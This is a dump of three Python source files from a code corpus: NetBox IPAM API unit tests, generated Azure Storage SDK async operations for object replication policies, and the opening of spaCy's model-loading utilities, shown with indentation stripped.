self.aggregate3 = Aggregate.objects.create(prefix=IPNetwork('192.168.0.0/16'), rir=self.rir1)
def test_get_aggregate(self):
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['prefix'], str(self.aggregate1.prefix))
def test_list_aggregates(self):
url = reverse('ipam-api:aggregate-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_aggregate(self):
data = {
'prefix': '192.0.2.0/24',
'rir': self.rir1.pk,
}
url = reverse('ipam-api:aggregate-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Aggregate.objects.count(), 4)
aggregate4 = Aggregate.objects.get(pk=response.data['id'])
self.assertEqual(str(aggregate4.prefix), data['prefix'])
self.assertEqual(aggregate4.rir_id, data['rir'])
def test_update_aggregate(self):
data = {
'prefix': '11.0.0.0/8',
'rir': self.rir2.pk,
}
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Aggregate.objects.count(), 3)
aggregate1 = Aggregate.objects.get(pk=response.data['id'])
self.assertEqual(str(aggregate1.prefix), data['prefix'])
self.assertEqual(aggregate1.rir_id, data['rir'])
def test_delete_aggregate(self):
url = reverse('ipam-api:aggregate-detail', kwargs={'pk': self.aggregate1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Aggregate.objects.count(), 2)
class RoleTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.role1 = Role.objects.create(name='Test Role 1', slug='test-role-1')
self.role2 = Role.objects.create(name='Test Role 2', slug='test-role-2')
self.role3 = Role.objects.create(name='Test Role 3', slug='test-role-3')
def test_get_role(self):
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.role1.name)
def test_list_roles(self):
url = reverse('ipam-api:role-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_role(self):
data = {
'name': 'Test Role 4',
'slug': 'test-role-4',
}
url = reverse('ipam-api:role-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Role.objects.count(), 4)
role4 = Role.objects.get(pk=response.data['id'])
self.assertEqual(role4.name, data['name'])
self.assertEqual(role4.slug, data['slug'])
def test_update_role(self):
data = {
'name': 'Test Role X',
'slug': 'test-role-x',
}
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Role.objects.count(), 3)
role1 = Role.objects.get(pk=response.data['id'])
self.assertEqual(role1.name, data['name'])
self.assertEqual(role1.slug, data['slug'])
def test_delete_role(self):
url = reverse('ipam-api:role-detail', kwargs={'pk': self.role1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Role.objects.count(), 2)
class PrefixTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.site1 = Site.objects.create(name='Test Site 1', slug='test-site-1')
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.vlan1 = VLAN.objects.create(vid=1, name='Test VLAN 1')
self.role1 = Role.objects.create(name='Test Role 1', slug='test-role-1')
self.prefix1 = Prefix.objects.create(prefix=IPNetwork('192.168.1.0/24'))
self.prefix2 = Prefix.objects.create(prefix=IPNetwork('192.168.2.0/24'))
self.prefix3 = Prefix.objects.create(prefix=IPNetwork('192.168.3.0/24'))
def test_get_prefix(self):
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['prefix'], str(self.prefix1.prefix))
def test_list_prefixs(self):
url = reverse('ipam-api:prefix-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_prefix(self):
data = {
'prefix': '192.168.4.0/24',
'site': self.site1.pk,
'vrf': self.vrf1.pk,
'vlan': self.vlan1.pk,
'role': self.role1.pk,
}
url = reverse('ipam-api:prefix-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Prefix.objects.count(), 4)
prefix4 = Prefix.objects.get(pk=response.data['id'])
self.assertEqual(str(prefix4.prefix), data['prefix'])
self.assertEqual(prefix4.site_id, data['site'])
self.assertEqual(prefix4.vrf_id, data['vrf'])
self.assertEqual(prefix4.vlan_id, data['vlan'])
self.assertEqual(prefix4.role_id, data['role'])
def test_update_prefix(self):
data = {
'prefix': '192.168.99.0/24',
'site': self.site1.pk,
'vrf': self.vrf1.pk,
'vlan': self.vlan1.pk,
'role': self.role1.pk,
}
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Prefix.objects.count(), 3)
prefix1 = Prefix.objects.get(pk=response.data['id'])
self.assertEqual(str(prefix1.prefix), data['prefix'])
self.assertEqual(prefix1.site_id, data['site'])
self.assertEqual(prefix1.vrf_id, data['vrf'])
self.assertEqual(prefix1.vlan_id, data['vlan'])
self.assertEqual(prefix1.role_id, data['role'])
def test_delete_prefix(self):
url = reverse('ipam-api:prefix-detail', kwargs={'pk': self.prefix1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Prefix.objects.count(), 2)
def test_available_ips(self):
prefix = Prefix.objects.create(prefix=IPNetwork('192.0.2.0/29'), is_pool=True)
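        # A /29 holds 8 addresses; a pool exposes all of them, a non-pool excludes the network and broadcast addresses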
url = reverse('ipam-api:prefix-available-ips', kwargs={'pk': prefix.pk})
# Retrieve all available IPs
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 8) # 8 because prefix.is_pool = True
# Change the prefix to not be a pool and try again
prefix.is_pool = False
prefix.save()
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 6) # 8 - 2 because prefix.is_pool = False
# Create all six available IPs
for i in range(6):
data = {
'description': 'Test IP {}'.format(i)
}
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(response.data['description'], data['description'])
# Try to create one more IP
response = self.client.post(url, {}, **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
self.assertIn('detail', response.data)
class IPAddressTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.ipaddress1 = IPAddress.objects.create(address=IPNetwork('192.168.0.1/24'))
self.ipaddress2 = IPAddress.objects.create(address=IPNetwork('192.168.0.2/24'))
self.ipaddress3 = IPAddress.objects.create(address=IPNetwork('192.168.0.3/24'))
def test_get_ipaddress(self):
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['address'], str(self.ipaddress1.address))
def test_list_ipaddresss(self):
url = reverse('ipam-api:ipaddress-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_ipaddress(self):
data = {
'address': '192.168.0.4/24',
'vrf': self.vrf1.pk,
}
url = reverse('ipam-api:ipaddress-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(IPAddress.objects.count(), 4)
ipaddress4 = IPAddress.objects.get(pk=response.data['id'])
self.assertEqual(str(ipaddress4.address), data['address'])
self.assertEqual(ipaddress4.vrf_id, data['vrf'])
def test_update_ipaddress(self):
data = {
'address': '192.168.0.99/24',
'vrf': self.vrf1.pk,
}
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(IPAddress.objects.count(), 3)
ipaddress1 = IPAddress.objects.get(pk=response.data['id'])
self.assertEqual(str(ipaddress1.address), data['address'])
self.assertEqual(ipaddress1.vrf_id, data['vrf'])
def test_delete_ipaddress(self):
url = reverse('ipam-api:ipaddress-detail', kwargs={'pk': self.ipaddress1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(IPAddress.objects.count(), 2)
class VLANGroupTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vlangroup1 = VLANGroup.objects.create(name='Test VLAN Group 1', slug='test-vlan-group-1')
self.vlangroup2 = VLANGroup.objects.create(name='Test VLAN Group 2', slug='test-vlan-group-2')
self.vlangroup3 = VLANGroup.objects.create(name='Test VLAN Group 3', slug='test-vlan-group-3')
def test_get_vlangroup(self):
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vlangroup1.name)
def test_list_vlangroups(self):
url = reverse('ipam-api:vlangroup-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vlangroup(self):
data = {
'name': 'Test VLAN Group 4',
'slug': 'test-vlan-group-4',
}
url = reverse('ipam-api:vlangroup-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VLANGroup.objects.count(), 4)
vlangroup4 = VLANGroup.objects.get(pk=response.data['id'])
self.assertEqual(vlangroup4.name, data['name'])
self.assertEqual(vlangroup4.slug, data['slug'])
def test_update_vlangroup(self):
data = {
'name': 'Test VLAN Group X',
'slug': 'test-vlan-group-x',
}
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VLANGroup.objects.count(), 3)
vlangroup1 = VLANGroup.objects.get(pk=response.data['id'])
self.assertEqual(vlangroup1.name, data['name'])
self.assertEqual(vlangroup1.slug, data['slug'])
def test_delete_vlangroup(self):
url = reverse('ipam-api:vlangroup-detail', kwargs={'pk': self.vlangroup1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VLANGroup.objects.count(), 2)
class VLANTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vlan1 = VLAN.objects.create(vid=1, name='Test VLAN 1')
self.vlan2 = VLAN.objects.create(vid=2, name='Test VLAN 2')
self.vlan3 = VLAN.objects.create(vid=3, name='Test VLAN 3')
def test_get_vlan(self):
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vlan1.name)
def test_list_vlans(self):
url = reverse('ipam-api:vlan-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vlan(self):
data = {
'vid': 4,
'name': 'Test VLAN 4',
}
url = reverse('ipam-api:vlan-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VLAN.objects.count(), 4)
vlan4 = VLAN.objects.get(pk=response.data['id'])
self.assertEqual(vlan4.vid, data['vid'])
self.assertEqual(vlan4.name, data['name'])
def test_update_vlan(self):
data = {
'vid': 99,
'name': 'Test VLAN X',
}
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VLAN.objects.count(), 3)
vlan1 = VLAN.objects.get(pk=response.data['id'])
self.assertEqual(vlan1.vid, data['vid'])
self.assertEqual(vlan1.name, data['name'])
def test_delete_vlan(self):
url = reverse('ipam-api:vlan-detail', kwargs={'pk': self.vlan1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VLAN.objects.count(), 2)
class ServiceTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
site = Site.objects.create(name='Test Site 1', slug='test-site-1')
manufacturer = Manufacturer.objects.create(name='Test Manufacturer 1', slug='test-manufacturer-1')
devicetype = DeviceType.objects.create(manufacturer=manufacturer, model='Test Device Type 1')
devicerole = DeviceRole.objects.create(name='Test Device Role 1', slug='test-device-role-1')
self.device1 = Device.objects.create(
name='Test Device 1', site=site, device_type=devicetype, device_role=devicerole
)
self.device2 = Device.objects.create(
name='Test Device 2', site=site, device_type=devicetype, device_role=devicerole
)
self.service1 = Service.objects.create(
device=self.device1, name='Test Service 1', protocol=IP_PROTOCOL_TCP, port=1
)
        self.service2 = Service.objects.create(
device=self.device1, name='Test Service 2', protocol=IP_PROTOCOL_TCP, port=2
)
        self.service3 = Service.objects.create(
device=self.device1, name='Test Service 3', protocol=IP_PROTOCOL_TCP, port=3
)
def test_get_service(self):
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.service1.name)
def test_list_services(self):
url = reverse('ipam-api:service-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_service(self):
data = {
'device': self.device1.pk,
'name': 'Test Service 4',
'protocol': IP_PROTOCOL_TCP,
'port': 4,
}
url = reverse('ipam-api:service-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(Service.objects.count(), 4)
service4 = Service.objects.get(pk=response.data['id'])
self.assertEqual(service4.device_id, data['device'])
self.assertEqual(service4.name, data['name'])
self.assertEqual(service4.protocol, data['protocol'])
self.assertEqual(service4.port, data['port'])
def test_update_service(self):
data = {
'device': self.device2.pk,
'name': 'Test Service X',
'protocol': IP_PROTOCOL_UDP,
'port': 99,
}
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(Service.objects.count(), 3)
service1 = Service.objects.get(pk=response.data['id'])
self.assertEqual(service1.device_id, data['device'])
self.assertEqual(service1.name, data['name'])
self.assertEqual(service1.protocol, data['protocol'])
self.assertEqual(service1.port, data['port'])
def test_delete_service(self):
url = reverse('ipam-api:service-detail', kwargs={'pk': self.service1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(Service.objects.count(), 2)
|
py | 1a40b9bcd7a60e5f00693e763691722793874a65 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._object_replication_policies_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ObjectReplicationPoliciesOperations:
"""ObjectReplicationPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ObjectReplicationPolicies"]:
"""List the object replication policies associated with the storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ObjectReplicationPolicies or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicies]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicies"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ObjectReplicationPolicies", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
**kwargs: Any
) -> "_models.ObjectReplicationPolicy":
"""Get the object replication policy of the storage account by policy ID.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ObjectReplicationPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ObjectReplicationPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
@distributed_trace_async
async def create_or_update(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
properties: "_models.ObjectReplicationPolicy",
**kwargs: Any
) -> "_models.ObjectReplicationPolicy":
"""Create or update the object replication policy of the storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:param properties: The object replication policy set to a storage account. A unique policy ID
will be created if absent.
:type properties: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ObjectReplicationPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.ObjectReplicationPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ObjectReplicationPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(properties, 'ObjectReplicationPolicy')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ObjectReplicationPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
account_name: str,
object_replication_policy_id: str,
**kwargs: Any
) -> None:
"""Deletes the object replication policy associated with the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param object_replication_policy_id: For the destination account, provide the value 'default'.
Configure the policy on the destination account first. For the source account, provide the
value of the policy ID that is returned when you download the policy that was defined on the
destination account. The policy is downloaded as a JSON file.
:type object_replication_policy_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
object_replication_policy_id=object_replication_policy_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/objectReplicationPolicies/{objectReplicationPolicyId}'} # type: ignore
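# Illustrative usage (not part of the generated code); assumes `client` is an authenticated
# azure.mgmt.storage.aio.StorageManagementClient and the names below are placeholders:
#     async for policy in client.object_replication_policies.list("my-rg", "mystorageaccount"):
#         print(policy.policy_id)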
|
py | 1a40bb5caef6d3465dd9f171e49a895c2a2ef514 | # coding: utf8
from __future__ import unicode_literals, print_function
import os
import pkg_resources
import importlib
import re
from pathlib import Path
import random
from collections import OrderedDict
from thinc.neural._classes.model import Model
from thinc.neural.ops import NumpyOps
import functools
import itertools
import numpy.random
import srsly
try:
import jsonschema
except ImportError:
jsonschema = None
try:
import cupy.random
except ImportError:
cupy = None
from .symbols import ORTH
from .compat import cupy, CudaStream, path2str, basestring_, unicode_
from .compat import import_file
from .errors import Errors, Warnings, deprecation_warning
LANGUAGES = {}
_data_path = Path(__file__).parent / "data"
_PRINT_ENV = False
def set_env_log(value):
global _PRINT_ENV
_PRINT_ENV = value
def lang_class_is_loaded(lang):
"""Check whether a Language class is already loaded. Language classes are
loaded lazily, to avoid expensive setup code associated with the language
data.
lang (unicode): Two-letter language code, e.g. 'en'.
RETURNS (bool): Whether a Language class has been loaded.
"""
global LANGUAGES
return lang in LANGUAGES
def get_lang_class(lang):
"""Import and load a Language class.
lang (unicode): Two-letter language code, e.g. 'en'.
RETURNS (Language): Language class.
"""
global LANGUAGES
# Check if an entry point is exposed for the language code
entry_point = get_entry_point("spacy_languages", lang)
if entry_point is not None:
LANGUAGES[lang] = entry_point
return entry_point
if lang not in LANGUAGES:
try:
module = importlib.import_module(".lang.%s" % lang, "spacy")
except ImportError as err:
raise ImportError(Errors.E048.format(lang=lang, err=err))
LANGUAGES[lang] = getattr(module, module.__all__[0])
return LANGUAGES[lang]
def set_lang_class(name, cls):
"""Set a custom Language class name that can be loaded via get_lang_class.
name (unicode): Name of Language class.
cls (Language): Language class.
"""
global LANGUAGES
LANGUAGES[name] = cls
def get_data_path(require_exists=True):
"""Get path to spaCy data directory.
require_exists (bool): Only return path if it exists, otherwise None.
RETURNS (Path or None): Data path or None.
"""
if not require_exists:
return _data_path
else:
return _data_path if _data_path.exists() else None
def set_data_path(path):
"""Set path to spaCy data directory.
path (unicode or Path): Path to new data directory.
"""
global _data_path
_data_path = ensure_path(path)
def ensure_path(path):
"""Ensure string is converted to a Path.
path: Anything. If string, it's converted to Path.
RETURNS: Path or original argument.
"""
if isinstance(path, basestring_):
return Path(path)
else:
return path
def load_model(name, **overrides):
"""Load a model from a shortcut link, package or data path.
name (unicode): Package name, shortcut link or model path.
**overrides: Specific overrides, like pipeline components to disable.
RETURNS (Language): `Language` class with the loaded model.
"""
data_path = get_data_path()
if not data_path or not data_path.exists():
raise IOError(Errors.E049.format(path=path2str(data_path)))
if isinstance(name, basestring_): # in data dir / shortcut
if name in set([d.name for d in data_path.iterdir()]):
return load_model_from_link(name, **overrides)
if is_package(name): # installed as package
return load_model_from_package(name, **overrides)
if Path(name).exists(): # path to model data directory
return load_model_from_path(Path(name), **overrides)
elif hasattr(name, "exists"): # Path or Path-like to model data
return load_model_from_path(name, **overrides)
raise IOError(Errors.E050.format(name=name))
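# e.g. load_model("en_core_web_sm", disable=["parser"]) resolves an installed package, a shortcut link, or a filesystem path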
def load_model_from_link(name, **overrides):
"""Load a model from a shortcut link, or directory in spaCy data path."""
path = get_data_path() / name / "__init__.py"
try:
cls = import_file(name, path)
except AttributeError:
raise IOError(Errors.E051.format(name=name))
return cls.load(**overrides)
def load_model_from_package(name, **overrides):
"""Load a model from an installed package."""
cls = importlib.import_module(name)
return cls.load(**overrides)
def load_model_from_path(model_path, meta=False, **overrides):
"""Load a model from a data directory path. Creates Language class with
pipeline from meta.json and then calls from_disk() with path."""
if not meta:
meta = get_model_meta(model_path)
cls = get_lang_class(meta["lang"])
nlp = cls(meta=meta, **overrides)
pipeline = meta.get("pipeline", [])
disable = overrides.get("disable", [])
if pipeline is True:
pipeline = nlp.Defaults.pipe_names
elif pipeline in (False, None):
pipeline = []
for name in pipeline:
if name not in disable:
config = meta.get("pipeline_args", {}).get(name, {})
component = nlp.create_pipe(name, config=config)
nlp.add_pipe(component, name=name)
return nlp.from_disk(model_path)
def load_model_from_init_py(init_file, **overrides):
"""Helper function to use in the `load()` method of a model package's
__init__.py.
init_file (unicode): Path to model's __init__.py, i.e. `__file__`.
**overrides: Specific overrides, like pipeline components to disable.
RETURNS (Language): `Language` class with loaded model.
"""
model_path = Path(init_file).parent
